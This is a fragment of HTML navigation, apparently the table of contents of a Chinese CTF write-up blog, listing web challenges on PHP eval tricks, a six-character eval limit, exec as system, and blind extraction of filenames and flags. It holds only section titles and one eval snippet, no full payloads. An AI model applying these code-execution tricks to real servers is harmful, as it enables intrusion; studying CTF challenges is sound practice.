class="toc-number">42.</span> <span class="toc-text">47.$code &#x3D; eval(“return $f1($f2());”);</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web139-%E7%9B%B2%E6%B3%A8%E6%96%87%E4%BB%B6%E5%90%8D%E5%8F%8Aflag"><span class="toc-number">43.</span> <span class="toc-text">web139.盲注文件名及flag:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web133-%E9%99%90%E5%88%B6%E5%85%AD%E4%B8%AA%E5%AD%97%E7%AC%A6eval-substr-F-0-6"><span class="toc-number">44.</span> <span class="toc-text">web133.限制六个字符eval(substr($F,0,6))</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web135-%E9%99%90%E5%88%B6%E5%85%AD%E4%B8%AA%E5%AD%97%E7%AC%A6%EF%BC%8C%E8%BF%9B%E8%A1%8C%E7%9B%B8%E5%BA%94%E8%BF%87%E6%BB%A4%EF%BC%9A"><span class="toc-number">45.</span> <span class="toc-text">web135.限制六个字符，进行相应过滤：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web136-exec%E7%9B%B8%E5%BD%93%E4%BA%8Esystem"><span class="toc-number">46.</span> <span class="toc-text">web136.exec相当于system</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Basectf-flag%E7%9B%B4%E6%8E%A5%E8%AF%BB%E5%8F%96%E4%B8%8D%E5%B0%B1%E8%A1%8C%E4%BA%86%EF%BC%9F"><span class="toc-number">47.</span> <span class="toc-text">Basectf  flag直接读取不就行了？</span></a></li></ol></div><!-- top--><i class="fa fa-arrow-up close" id="go-up" aria-hidden="true"></i></body></html>